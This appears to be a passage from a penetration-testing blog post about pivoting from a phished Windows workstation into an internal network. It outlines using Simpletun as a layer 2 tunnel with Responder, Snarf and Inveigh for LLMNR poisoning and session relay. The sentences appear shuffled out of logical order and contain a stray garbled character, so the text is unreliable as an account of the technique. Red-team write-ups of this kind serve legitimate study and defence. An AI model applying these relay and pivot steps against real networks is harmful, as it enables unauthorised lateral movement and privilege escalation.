Our preference is to slowly and deliberately use relayed sessions to exploit other endpoints.
Same as the previous blog post, Frank is still sending LLMNR broadcasts looking for a fileshare that does not exist.
The goal is to spread to other endpoints on the direct network, extending our foothold and hopefully, our privileges. Hal is a domain user with local administrator on int-win10 but no privileges elsewhere. Another option is Inveigh, a powershell LLMNR/NBNS spoofer with relay capabilities that is included in Empire and available for pivot poisoning without the layer 2 tunnel.Īfter a successful phishing campaign we have a foothold on Hal’s PC, int-win10. Commercial products Metasploit Pro and Cobalt Strike have this feature built-in and perform the pivot via encrypted channels, if you are not intentionally looking to get caught by Blue Teams, use them. To pivot in we’ll be using Simpletun and a layer 2 pivoting client, this will give the ability to assign an IP address to an interface on our attacking VM, listen for broadcasts, and where available, respond. In the previous post we discussed using Responder with Snarf, this post will be doing the same but through a pivot.
